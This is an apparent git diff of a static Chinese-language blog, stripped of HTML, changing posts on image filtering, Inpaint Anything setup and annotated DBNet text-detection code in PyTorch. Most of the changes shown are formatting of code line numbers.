      ax = fig.add_subplot(1, 2, 1)
      plt.xticks([])
      plt.yticks([])
      ax.imshow(img, cmap='gray')
      ax.title.set_text('Original')

      ax_f = fig.add_subplot(1, 2, 2)
      plt.xticks([])
      plt.yticks([])
      ax_f.imshow(img_f, cmap='gray')
      ax_f.title.set_text('GaussianBlur')

      plt.show()

      png

      • @@ -920,7 +918,7 @@

        kernel_x = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
        kernel_y = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])
        img_x = cv2.filter2D(img, cv2.CV_8UC3, kernel_x)
        img_y = cv2.filter2D(img, cv2.CV_8UC3, kernel_y)

        fig = plt.figure(figsize=(4, 4))
        ax = fig.add_subplot(1, 2, 1)
        plt.xticks([])
        plt.yticks([])
        ax.imshow(img, cmap='gray')
        ax.title.set_text('Original')

        ax_x = fig.add_subplot(2, 2, 2)
        plt.xticks([])
        plt.yticks([])
        ax_x.imshow(img_x, cmap='gray')
        ax_x.title.set_text('x')

        ax_y = fig.add_subplot(2, 2, 4)
        plt.xticks([])
        plt.yticks([])
        ax_y.imshow(img_y, cmap='gray')
        ax_y.title.set_text('y')

        plt.show()
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        kernel_x = np.array([[1, 2, 1], [0, 0, 0], [-1, -2, -1]])
        kernel_y = np.array([[-1, 0, 1], [-2, 0, 2], [-1, 0, 1]])
        img_x = cv2.filter2D(img, cv2.CV_8UC3, kernel_x)
        img_y = cv2.filter2D(img, cv2.CV_8UC3, kernel_y)

        fig = plt.figure(figsize=(4, 4))
        ax = fig.add_subplot(1, 2, 1)
        plt.xticks([])
        plt.yticks([])
        ax.imshow(img, cmap='gray')
        ax.title.set_text('Original')

        ax_x = fig.add_subplot(2, 2, 2)
        plt.xticks([])
        plt.yticks([])
        ax_x.imshow(img_x, cmap='gray')
        ax_x.title.set_text('x')

        ax_y = fig.add_subplot(2, 2, 4)
        plt.xticks([])
        plt.yticks([])
        ax_y.imshow(img_y, cmap='gray')
        ax_y.title.set_text('y')

        plt.show()

        png


        ​ 梯度强度和方向可以从向量 $[g_x,g_y]^T$ 得出.对于字符特征提取,计算归一化图像上每个像素的梯度。梯度方向的范围被划分为若干个区域(比如 $8$ 个或 $16$ 个),每个区域对应一个方向平面。每个像素被分配到一个方向区域,梯度强度贡献相应平面的强度。然而,在我们的实验中,我们采用了另一种策略,即将每个梯度向量分解为标准方向上的分量。

        @@ -1265,6 +1263,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-How much real data do we actually need-Analyzing object detection performance using synthetic and real data/index.html b/posts/Paper-How much real data do we actually need-Analyzing object detection performance using synthetic and real data/index.html index f3f39cd2cb..ab6b5bfe27 100644 --- a/posts/Paper-How much real data do we actually need-Analyzing object detection performance using synthetic and real data/index.html +++ b/posts/Paper-How much real data do we actually need-Analyzing object detection performance using synthetic and real data/index.html @@ -44,8 +44,6 @@ - - @@ -736,6 +734,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Image Visual Realism-From Human Perception/index.html b/posts/Paper-Image Visual Realism-From Human Perception/index.html index 80414bbd14..61fbd3b027 100644 --- a/posts/Paper-Image Visual Realism-From Human Perception/index.html +++ b/posts/Paper-Image Visual Realism-From Human Perception/index.html @@ -44,8 +44,6 @@ - - @@ -715,6 +713,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Inpaint Anything/index.html b/posts/Paper-Inpaint Anything/index.html index 0719e51e3a..aa7fbc0823 100644 --- a/posts/Paper-Inpaint Anything/index.html +++ b/posts/Paper-Inpaint Anything/index.html @@ -44,8 +44,6 @@ - - @@ -449,21 +447,21 @@

        笔记

        代码

        跑环境

        ​ 因为之前已经搭好了 segment-anything 的环境,所以 clone 一份:

        -
        conda create -n inpaint-anything --clone segment-anything
        +
        1
        conda create -n inpaint-anything --clone segment-anything

        geekyutao/Inpaint-Anything: Inpaint anything using Segment Anything and inpainting models. (github.com) 下载代码:

        png

        在仓库目录下:

        -
        python -m pip install -e segment_anything
        +
        1
        python -m pip install -e segment_anything

        一大堆库,这玩意儿好慢啊!

        -
        python -m pip install -r lama/requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple
        +
        1
        python -m pip install -r lama/requirements.txt -i https://pypi.tuna.tsinghua.edu.cn/simple

        下载预训练好的模型: sam_vit_h_4b8939.pthbig-lama(这个居然是俄罗斯的网盘,注册了老半天,真傻逼啊),并将它们放入 ./pretrained_models

        png

        在 pycharm 中的 Terminal 运行示例命令:

        -
        python fill_anything.py --input_img ./example/remove-anything/dog.jpg  --point_coords 750 500  --point_labels 1  --text_prompt "a teddy bear on a bench" --dilate_kernel_size 15  --output_dir ./results --sam_model_type "vit_h" --sam_ckpt ./pretrained_models/sam_vit_h_4b8939.pth
        +
        1
        python fill_anything.py --input_img ./example/remove-anything/dog.jpg  --point_coords 750 500  --point_labels 1  --text_prompt "a teddy bear on a bench" --dilate_kernel_size 15  --output_dir ./results --sam_model_type "vit_h" --sam_ckpt ./pretrained_models/sam_vit_h_4b8939.pth

        又要下载一坨,等吧。

        png

        居然说我显存不够,寄!

        -
        torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 640.00 MiB (GPU 0; 8.00 GiB total capacity; 6.16 GiB already allocated; 0 bytes free; 6.66 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid frapip install git+https://github.com/openai/CLIP.git          
        +
        1
        torch.cuda.OutOfMemoryError: CUDA out of memory. Tried to allocate 640.00 MiB (GPU 0; 8.00 GiB total capacity; 6.16 GiB already allocated; 0 bytes free; 6.66 GiB reserved in total by PyTorch) If reserved memory is >> allocated memory try setting max_split_size_mb to avoid frapip install git+https://github.com/openai/CLIP.git          
        @@ -681,6 +679,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Intelligent Data Analysis/index.html b/posts/Paper-Intelligent Data Analysis/index.html index 559688c289..a5a24f7bd3 100644 --- a/posts/Paper-Intelligent Data Analysis/index.html +++ b/posts/Paper-Intelligent Data Analysis/index.html @@ -44,8 +44,6 @@ - - @@ -400,7 +398,7 @@

        Paper-Intelligent Data Analysis

        @@ -4892,6 +4890,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Palette-Image-to-Image Diffusion Models/index.html b/posts/Paper-Palette-Image-to-Image Diffusion Models/index.html index b5f3f8ba19..4ef9b1f256 100644 --- a/posts/Paper-Palette-Image-to-Image Diffusion Models/index.html +++ b/posts/Paper-Palette-Image-to-Image Diffusion Models/index.html @@ -44,8 +44,6 @@ - - @@ -1158,6 +1156,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Polygonal approximation of digital planar curve using novel significant measure/index.html b/posts/Paper-Polygonal approximation of digital planar curve using novel significant measure/index.html index a6741d695c..bdf1c87cb2 100644 --- a/posts/Paper-Polygonal approximation of digital planar curve using novel significant measure/index.html +++ b/posts/Paper-Polygonal approximation of digital planar curve using novel significant measure/index.html @@ -44,8 +44,6 @@ - - @@ -746,6 +744,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion/index.html b/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion/index.html index e71521d770..083fe1ac51 100644 --- a/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion/index.html +++ b/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization and Adaptive Scale Fusion/index.html @@ -44,8 +44,6 @@ - - @@ -796,6 +794,8 @@

        目录

        var highlightShrink = ""; var HighlightHeightLimit = ""; + + diff --git a/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization/index.html b/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization/index.html index 61ba31744e..aeb4c5812f 100644 --- a/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization/index.html +++ b/posts/Paper-Real-Time Scene Text Detection with Differentiable Binarization/index.html @@ -44,8 +44,6 @@ - - @@ -421,7 +419,7 @@

        资源

        Gitee:configs/det/dbnet/README_CN.md · MindSpore Lab/mindocr - Gitee.com

      • -

        代码复现:Server-MindOCR-Zi-Zi’s Journey

        +

        代码复现:Server-MindOCR-Zi-Zi’s Journey

      • DBNet 的简单复现_dbnet 复现-CSDN 博客

        @@ -469,7 +467,7 @@

      Methodology

      webp

      -
      # -*- coding: utf-8 -*-
      # @Time : 2019/8/23 21:57
      # @Author : zhoujun
      from addict import Dict
      from torch import nn
      import torch.nn.functional as F

      from models.backbone import build_backbone
      from models.neck import build_neck
      from models.head import build_head


      class Model(nn.Module):
      def __init__(self, model_config: dict):
      """
      PANnet
      :param model_config: 模型配置
      """
      super().__init__()
      model_config = Dict(model_config) # 一个配置字典,用于指定模型的结构。转换为 Dict 对象,方便通过属性访问。
      # 从配置字典中提取 backbone、neck 和 head 的类型,并分别从配置中删除它们。
      backbone_type = model_config.backbone.pop('type')
      neck_type = model_config.neck.pop('type')
      head_type = model_config.head.pop('type')
      # 使用 build_backbone、build_neck 和 build_head 函数构建模型的不同部分。
      self.backbone = build_backbone(backbone_type, **model_config.backbone)
      self.neck = build_neck(neck_type, in_channels=self.backbone.out_channels, **model_config.neck)
      self.head = build_head(head_type, in_channels=self.neck.out_channels, **model_config.head)
      # self.name 存储了模型的名字,由 backbone、neck 和 head 的类型组合而成。
      self.name = f'{backbone_type}_{neck_type}_{head_type}'

      def forward(self, x):
      _, _, H, W = x.size() # x 是输入的张量,尺寸为 [batch_size, channels, height, width]。
      backbone_out = self.backbone(x) # 使用 self.backbone 处理输入,得到 backbone_out。
      neck_out = self.neck(backbone_out) # 使用 self.neck 处理 backbone_out,得到 neck_out。
      y = self.head(neck_out) # 使用 self.head 处理 neck_out,得到最终输出 y。
      y = F.interpolate(y, size=(H, W), mode='bilinear', align_corners=True) # F.interpolate 用于将输出 y 的尺寸调整为与输入 x 相同,以保持空间分辨率一致。
      return y # 最终返回调整后的 y。


      if __name__ == '__main__':
      import torch

      device = torch.device('cpu') # 创建一个 CPU 设备(可以改为 GPU)。
      x = torch.zeros(2, 3, 640, 640).to(device) # 创建一个大小为 [2, 3, 640, 640] 的零张量作为输入。

      model_config = {
      'backbone': {'type': 'resnest50', 'pretrained': True, "in_channels": 3},
      'neck': {'type': 'FPN', 'inner_channels': 256}, # 分割头,FPN or FPEM_FFM
      'head': {'type': 'DBHead', 'out_channels': 2, 'k': 50},
      }
      model = Model(model_config=model_config).to(device) # 初始化 Model 对象,传入配置字典。
      import time # 测量前向传播的时间。

      tic = time.time()
      y = model(x)
      # 打印出前向传播的时间、输出的形状、模型的名称和模型的详细结构。
      print(time.time() - tic)
      print(y.shape)
      print(model.name)
      print(model)
      #(可选)将模型的状态字典保存到文件 PAN.pth。
      # torch.save(model.state_dict(), 'PAN.pth')
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        59
        60
        61
        62
        63
        # -*- coding: utf-8 -*-
        # @Time : 2019/8/23 21:57
        # @Author : zhoujun
        from addict import Dict
        from torch import nn
        import torch.nn.functional as F

        from models.backbone import build_backbone
        from models.neck import build_neck
        from models.head import build_head


        class Model(nn.Module):
        def __init__(self, model_config: dict):
        """
        PANnet
        :param model_config: 模型配置
        """
        super().__init__()
        model_config = Dict(model_config) # 一个配置字典,用于指定模型的结构。转换为 Dict 对象,方便通过属性访问。
        # 从配置字典中提取 backbone、neck 和 head 的类型,并分别从配置中删除它们。
        backbone_type = model_config.backbone.pop('type')
        neck_type = model_config.neck.pop('type')
        head_type = model_config.head.pop('type')
        # 使用 build_backbone、build_neck 和 build_head 函数构建模型的不同部分。
        self.backbone = build_backbone(backbone_type, **model_config.backbone)
        self.neck = build_neck(neck_type, in_channels=self.backbone.out_channels, **model_config.neck)
        self.head = build_head(head_type, in_channels=self.neck.out_channels, **model_config.head)
        # self.name 存储了模型的名字,由 backbone、neck 和 head 的类型组合而成。
        self.name = f'{backbone_type}_{neck_type}_{head_type}'

        def forward(self, x):
        _, _, H, W = x.size() # x 是输入的张量,尺寸为 [batch_size, channels, height, width]。
        backbone_out = self.backbone(x) # 使用 self.backbone 处理输入,得到 backbone_out。
        neck_out = self.neck(backbone_out) # 使用 self.neck 处理 backbone_out,得到 neck_out。
        y = self.head(neck_out) # 使用 self.head 处理 neck_out,得到最终输出 y。
        y = F.interpolate(y, size=(H, W), mode='bilinear', align_corners=True) # F.interpolate 用于将输出 y 的尺寸调整为与输入 x 相同,以保持空间分辨率一致。
        return y # 最终返回调整后的 y。


        if __name__ == '__main__':
        import torch

        device = torch.device('cpu') # 创建一个 CPU 设备(可以改为 GPU)。
        x = torch.zeros(2, 3, 640, 640).to(device) # 创建一个大小为 [2, 3, 640, 640] 的零张量作为输入。

        model_config = {
        'backbone': {'type': 'resnest50', 'pretrained': True, "in_channels": 3},
        'neck': {'type': 'FPN', 'inner_channels': 256}, # 分割头,FPN or FPEM_FFM
        'head': {'type': 'DBHead', 'out_channels': 2, 'k': 50},
        }
        model = Model(model_config=model_config).to(device) # 初始化 Model 对象,传入配置字典。
        import time # 测量前向传播的时间。

        tic = time.time()
        y = model(x)
        # 打印出前向传播的时间、输出的形状、模型的名称和模型的详细结构。
        print(time.time() - tic)
        print(y.shape)
        print(model.name)
        print(model)
        #(可选)将模型的状态字典保存到文件 PAN.pth。
        # torch.save(model.state_dict(), 'PAN.pth')
        • resnet
        • MobilenetV3
        • shfflenetv2
        • @@ -497,18 +495,18 @@

          Methodology

      -
      import torch
      import torch.nn.functional as F
      from torch import nn

      from models.basic import ConvBnRelu


      class FPN(nn.Module):
      def __init__(self, in_channels, inner_channels=256, **kwargs):
      """
      :param in_channels: 基础网络输出的维度
      :param kwargs:
      """
      super().__init__()
      inplace = True
      self.conv_out = inner_channels
      inner_channels = inner_channels // 4 # 定义了在融合过程中的中间通道数。
      # reduce layers 是用于将不同层的特征图通道数减少到 inner_channels 的卷积层。
      self.reduce_conv_c2 = ConvBnRelu(in_channels[0], inner_channels, kernel_size=1, inplace=inplace)
      self.reduce_conv_c3 = ConvBnRelu(in_channels[1], inner_channels, kernel_size=1, inplace=inplace)
      self.reduce_conv_c4 = ConvBnRelu(in_channels[2], inner_channels, kernel_size=1, inplace=inplace)
      self.reduce_conv_c5 = ConvBnRelu(in_channels[3], inner_channels, kernel_size=1, inplace=inplace)
      # Smooth layers 平滑层,用于进一步处理不同层次的特征图。
      self.smooth_p4 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
      self.smooth_p3 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
      self.smooth_p2 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)

      self.conv = nn.Sequential(
      nn.Conv2d(self.conv_out, self.conv_out, kernel_size=3, padding=1, stride=1),
      nn.BatchNorm2d(self.conv_out),
      nn.ReLU(inplace=inplace)
      ) # 是一个卷积层组合,用于处理最终融合后的特征图,包括卷积、批归一化和 ReLU 激活函数。
      self.out_channels = self.conv_out # 保存了输出特征图的通道数。

      def forward(self, x):
      c2, c3, c4, c5 = x # 是一个包含四个特征图的元组 (c2, c3, c4, c5),这些特征图来自基础网络的不同层。
      # Top-down
      p5 = self.reduce_conv_c5(c5)
      p4 = self._upsample_add(p5, self.reduce_conv_c4(c4))
      p4 = self.smooth_p4(p4)
      p3 = self._upsample_add(p4, self.reduce_conv_c3(c3))
      p3 = self.smooth_p3(p3)
      p2 = self._upsample_add(p3, self.reduce_conv_c2(c2))
      p2 = self.smooth_p2(p2)

      x = self._upsample_cat(p2, p3, p4, p5) # 将所有层的特征图在通道维度上进行拼接。
      x = self.conv(x) # 对拼接后的特征图进行最终处理,输出融合后的特征图。
      return x

      def _upsample_add(self, x, y):
      return F.interpolate(x, size=y.size()[2:]) + y # 将输入 x 上采样到与 y 相同的尺寸,并将其与 y 相加。

      def _upsample_cat(self, p2, p3, p4, p5): # 将 p2、p3、p4 和 p5 上采样到相同的尺寸,然后在通道维度上拼接它们。
      h, w = p2.size()[2:]
      p3 = F.interpolate(p3, size=(h, w))
      p4 = F.interpolate(p4, size=(h, w))
      p5 = F.interpolate(p5, size=(h, w))
      return torch.cat([p2, p3, p4, p5], dim=1)
        +
        1
        2
        3
        4
        5
        6
        7
        8
        9
        10
        11
        12
        13
        14
        15
        16
        17
        18
        19
        20
        21
        22
        23
        24
        25
        26
        27
        28
        29
        30
        31
        32
        33
        34
        35
        36
        37
        38
        39
        40
        41
        42
        43
        44
        45
        46
        47
        48
        49
        50
        51
        52
        53
        54
        55
        56
        57
        58
        import torch
        import torch.nn.functional as F
        from torch import nn

        from models.basic import ConvBnRelu


        class FPN(nn.Module):
        def __init__(self, in_channels, inner_channels=256, **kwargs):
        """
        :param in_channels: 基础网络输出的维度
        :param kwargs:
        """
        super().__init__()
        inplace = True
        self.conv_out = inner_channels
        inner_channels = inner_channels // 4 # 定义了在融合过程中的中间通道数。
        # reduce layers 是用于将不同层的特征图通道数减少到 inner_channels 的卷积层。
        self.reduce_conv_c2 = ConvBnRelu(in_channels[0], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c3 = ConvBnRelu(in_channels[1], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c4 = ConvBnRelu(in_channels[2], inner_channels, kernel_size=1, inplace=inplace)
        self.reduce_conv_c5 = ConvBnRelu(in_channels[3], inner_channels, kernel_size=1, inplace=inplace)
        # Smooth layers 平滑层,用于进一步处理不同层次的特征图。
        self.smooth_p4 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
        self.smooth_p3 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)
        self.smooth_p2 = ConvBnRelu(inner_channels, inner_channels, kernel_size=3, padding=1, inplace=inplace)

        self.conv = nn.Sequential(
        nn.Conv2d(self.conv_out, self.conv_out, kernel_size=3, padding=1, stride=1),
        nn.BatchNorm2d(self.conv_out),
        nn.ReLU(inplace=inplace)
        ) # 是一个卷积层组合,用于处理最终融合后的特征图,包括卷积、批归一化和 ReLU 激活函数。
        self.out_channels = self.conv_out # 保存了输出特征图的通道数。

        def forward(self, x):
        c2, c3, c4, c5 = x # 是一个包含四个特征图的元组 (c2, c3, c4, c5),这些特征图来自基础网络的不同层。
        # Top-down
        p5 = self.reduce_conv_c5(c5)
        p4 = self._upsample_add(p5, self.reduce_conv_c4(c4))
        p4 = self.smooth_p4(p4)
        p3 = self._upsample_add(p4, self.reduce_conv_c3(c3))
        p3 = self.smooth_p3(p3)
        p2 = self._upsample_add(p3, self.reduce_conv_c2(c2))
        p2 = self.smooth_p2(p2)

        x = self._upsample_cat(p2, p3, p4, p5) # 将所有层的特征图在通道维度上进行拼接。
        x = self.conv(x) # 对拼接后的特征图进行最终处理,输出融合后的特征图。
        return x

        def _upsample_add(self, x, y):
        return F.interpolate(x, size=y.size()[2:]) + y # 将输入 x 上采样到与 y 相同的尺寸,并将其与 y 相加。

        def _upsample_cat(self, p2, p3, p4, p5): # 将 p2、p3、p4 和 p5 上采样到相同的尺寸,然后在通道维度上拼接它们。
        h, w = p2.size()[2:]
        p3 = F.interpolate(p3, size=(h, w))
        p4 = F.interpolate(p4, size=(h, w))
        p5 = F.interpolate(p5, size=(h, w))
        return torch.cat([p2, p3, p4, p5], dim=1)
      • ConvHead
        • ConvHead 是一个非常基础且常见的模块,通过一个 1x1 卷积层和 Sigmoid 激活函数对输入特征图进行变换。它主要用于生成最终的输出特征图,特别是在需要将特征图转换为概率图的任务中。
      -
      import torch
      from torch import nn


      class ConvHead(nn.Module):
      def __init__(self, in_channels, out_channels,**kwargs):
      super().__init__()
      self.conv = nn.Sequential(
      # 一个卷积层,使用 1x1 的卷积核来对输入进行线性变换。这种卷积核的大小使得它主要作用于通道维度上的线性变换,而不改变空间维度(宽度和高度)。
      nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
      # 一个激活函数,将卷积层的输出限制在 0 到 1 之间。这个函数通常用于需要输出概率值的任务,例如二分类问题或需要对特征图进行归一化处理的任务。
      nn.Sigmoid()
      )

      def forward(self, x):
      return self.conv(x)
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      import torch
      from torch import nn


      class ConvHead(nn.Module):
      def __init__(self, in_channels, out_channels,**kwargs):
      super().__init__()
      self.conv = nn.Sequential(
      # 一个卷积层,使用 1x1 的卷积核来对输入进行线性变换。这种卷积核的大小使得它主要作用于通道维度上的线性变换,而不改变空间维度(宽度和高度)。
      nn.Conv2d(in_channels=in_channels, out_channels=out_channels, kernel_size=1),
      # 一个激活函数,将卷积层的输出限制在 0 到 1 之间。这个函数通常用于需要输出概率值的任务,例如二分类问题或需要对特征图进行归一化处理的任务。
      nn.Sigmoid()
      )

      def forward(self, x):
      return self.conv(x)
      • DBHead
      -
      import torch
      from torch import nn

      class DBHead(nn.Module):
      def __init__(self, in_channels, out_channels, k = 50):
      super().__init__()
      self.k = k # 用于前向传播时的步长函数的参数。
      self.binarize = nn.Sequential( # 一个生成二值图的顺序模块
      nn.Conv2d(in_channels, in_channels // 4, 3, padding=1), # 将通道数从 in_channels 降到 in_channels // 4,使用 3x3 的卷积核。
      nn.BatchNorm2d(in_channels // 4), # 批量归一化。
      nn.ReLU(inplace=True), # 非线性激活函数。
      nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 2, 2), # 上采样特征图两次(空间维度翻倍)。
      nn.BatchNorm2d(in_channels // 4),
      nn.ReLU(inplace=True),
      nn.ConvTranspose2d(in_channels // 4, 1, 2, 2),
      nn.Sigmoid()) # 输出 0 到 1 之间的值,适用于二值图。
      self.binarize.apply(self.weights_init)

      self.thresh = self._init_thresh(in_channels) # 使用 _init_thresh 方法生成阈值图。
      self.thresh.apply(self.weights_init)

      def forward(self, x):
      shrink_maps = self.binarize(x) # binarize 模块的输出。
      threshold_maps = self.thresh(x) # thresh 模块的输出。
      if self.training: # 训练模式下
      binary_maps = self.step_function(shrink_maps, threshold_maps) # 使用 step_function 计算二值图。
      y = torch.cat((shrink_maps, threshold_maps, binary_maps), dim=1) # 将 shrink_maps、threshold_maps 和 binary_maps 连接在一起。
      else:
      y = torch.cat((shrink_maps, threshold_maps), dim=1)
      return y

      def weights_init(self, m): # 使用 He 初始化(kaiming_normal_)初始化卷积层的权重,并为批量归一化层设置特定的值。
      classname = m.__class__.__name__
      if classname.find('Conv') != -1:
      nn.init.kaiming_normal_(m.weight.data)
      elif classname.find('BatchNorm') != -1:
      m.weight.data.fill_(1.)
      m.bias.data.fill_(1e-4)

      def _init_thresh(self, inner_channels, serial=False, smooth=False, bias=False):
      # 创建一个生成阈值图的顺序模块。使用 nn.Conv2d、批量归一化、ReLU、上采样和 Sigmoid 激活。
      in_channels = inner_channels
      if serial:
      in_channels += 1
      self.thresh = nn.Sequential(
      nn.Conv2d(in_channels, inner_channels // 4, 3, padding=1, bias=bias),
      nn.BatchNorm2d(inner_channels // 4),
      nn.ReLU(inplace=True),
      self._init_upsample(inner_channels // 4, inner_channels // 4, smooth=smooth, bias=bias),
      nn.BatchNorm2d(inner_channels // 4),
      nn.ReLU(inplace=True),
      self._init_upsample(inner_channels // 4, 1, smooth=smooth, bias=bias),
      nn.Sigmoid())
      return self.thresh

      def _init_upsample(self, in_channels, out_channels, smooth=False, bias=False):
      # 定义上采样模块,使用邻近插值加卷积,或者使用转置卷积层。
      if smooth: # 平滑上采样
      inter_out_channels = out_channels
      if out_channels == 1:
      inter_out_channels = in_channels
      module_list = [
      nn.Upsample(scale_factor=2, mode='nearest'), # 使用 nn.Upsample 将输入的空间维度扩大一倍(使用最近邻插值)。
      nn.Conv2d(in_channels, inter_out_channels, 3, 1, 1, bias=bias)] # 接着应用 nn.Conv2d 层来对上采样后的特征图进行进一步处理。
      if out_channels == 1:
      # 如果 out_channels 等于 1,还会添加一个额外的 nn.Conv2d 层,以调整输出通道数。
      module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=1, bias=True))
      return nn.Sequential(module_list)
      else:
      # 直接使用 nn.ConvTranspose2d 层进行上采样(转置卷积),以实现空间维度的扩展。
      return nn.ConvTranspose2d(in_channels, out_channels, 2, 2)

      def step_function(self, x, y):
      # 应用步长函数生成二值图。此函数使用类似 sigmoid 的曲线来基于 x(收缩图)和 y(阈值图)的差异产生 0 到 1 之间的值。
      return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
      +
      1
      2
      3
      4
      5
      6
      7
      8
      9
      10
      11
      12
      13
      14
      15
      16
      17
      18
      19
      20
      21
      22
      23
      24
      25
      26
      27
      28
      29
      30
      31
      32
      33
      34
      35
      36
      37
      38
      39
      40
      41
      42
      43
      44
      45
      46
      47
      48
      49
      50
      51
      52
      53
      54
      55
      56
      57
      58
      59
      60
      61
      62
      63
      64
      65
      66
      67
      68
      69
      70
      71
      72
      73
      74
      75
      import torch
      from torch import nn

      class DBHead(nn.Module):
      def __init__(self, in_channels, out_channels, k = 50):
      super().__init__()
      self.k = k # 用于前向传播时的步长函数的参数。
      self.binarize = nn.Sequential( # 一个生成二值图的顺序模块
      nn.Conv2d(in_channels, in_channels // 4, 3, padding=1), # 将通道数从 in_channels 降到 in_channels // 4,使用 3x3 的卷积核。
      nn.BatchNorm2d(in_channels // 4), # 批量归一化。
      nn.ReLU(inplace=True), # 非线性激活函数。
      nn.ConvTranspose2d(in_channels // 4, in_channels // 4, 2, 2), # 上采样特征图两次(空间维度翻倍)。
      nn.BatchNorm2d(in_channels // 4),
      nn.ReLU(inplace=True),
      nn.ConvTranspose2d(in_channels // 4, 1, 2, 2),
      nn.Sigmoid()) # 输出 0 到 1 之间的值,适用于二值图。
      self.binarize.apply(self.weights_init)

      self.thresh = self._init_thresh(in_channels) # 使用 _init_thresh 方法生成阈值图。
      self.thresh.apply(self.weights_init)

      def forward(self, x):
      shrink_maps = self.binarize(x) # binarize 模块的输出。
      threshold_maps = self.thresh(x) # thresh 模块的输出。
      if self.training: # 训练模式下
      binary_maps = self.step_function(shrink_maps, threshold_maps) # 使用 step_function 计算二值图。
      y = torch.cat((shrink_maps, threshold_maps, binary_maps), dim=1) # 将 shrink_maps、threshold_maps 和 binary_maps 连接在一起。
      else:
      y = torch.cat((shrink_maps, threshold_maps), dim=1)
      return y

      def weights_init(self, m): # 使用 He 初始化(kaiming_normal_)初始化卷积层的权重,并为批量归一化层设置特定的值。
      classname = m.__class__.__name__
      if classname.find('Conv') != -1:
      nn.init.kaiming_normal_(m.weight.data)
      elif classname.find('BatchNorm') != -1:
      m.weight.data.fill_(1.)
      m.bias.data.fill_(1e-4)

      def _init_thresh(self, inner_channels, serial=False, smooth=False, bias=False):
      # 创建一个生成阈值图的顺序模块。使用 nn.Conv2d、批量归一化、ReLU、上采样和 Sigmoid 激活。
      in_channels = inner_channels
      if serial:
      in_channels += 1
      self.thresh = nn.Sequential(
      nn.Conv2d(in_channels, inner_channels // 4, 3, padding=1, bias=bias),
      nn.BatchNorm2d(inner_channels // 4),
      nn.ReLU(inplace=True),
      self._init_upsample(inner_channels // 4, inner_channels // 4, smooth=smooth, bias=bias),
      nn.BatchNorm2d(inner_channels // 4),
      nn.ReLU(inplace=True),
      self._init_upsample(inner_channels // 4, 1, smooth=smooth, bias=bias),
      nn.Sigmoid())
      return self.thresh

      def _init_upsample(self, in_channels, out_channels, smooth=False, bias=False):
      # 定义上采样模块,使用邻近插值加卷积,或者使用转置卷积层。
      if smooth: # 平滑上采样
      inter_out_channels = out_channels
      if out_channels == 1:
      inter_out_channels = in_channels
      module_list = [
      nn.Upsample(scale_factor=2, mode='nearest'), # 使用 nn.Upsample 将输入的空间维度扩大一倍(使用最近邻插值)。
      nn.Conv2d(in_channels, inter_out_channels, 3, 1, 1, bias=bias)] # 接着应用 nn.Conv2d 层来对上采样后的特征图进行进一步处理。
      if out_channels == 1:
      # 如果 out_channels 等于 1,还会添加一个额外的 nn.Conv2d 层,以调整输出通道数。
      module_list.append(nn.Conv2d(in_channels, out_channels, kernel_size=1, stride=1, padding=1, bias=True))
      return nn.Sequential(module_list)
      else:
      # 直接使用 nn.ConvTranspose2d 层进行上采样(转置卷积),以实现空间维度的扩展。
      return nn.ConvTranspose2d(in_channels, out_channels, 2, 2)

      def step_function(self, x, y):
      # 应用步长函数生成二值图。此函数使用类似 sigmoid 的曲线来基于 x(收缩图)和 y(阈值图)的差异产生 0 到 1 之间的值。
      return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
    1. 输入图像输入到 feature-pyramid back-bone 中

      @@ -540,7 +538,7 @@

      def step_function(self, x, y):
      return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
      # 这个 step_function 就是 Differentiable binarization 的公式
      +
      1
      2
      3
      def step_function(self, x, y):
      return torch.reciprocal(1 + torch.exp(-self.k * (x - y)))
      # 这个 step_function 就是 Differentiable binarization 的公式

      webp

      DB 的 k 越大,越接近于 Standard Binarization

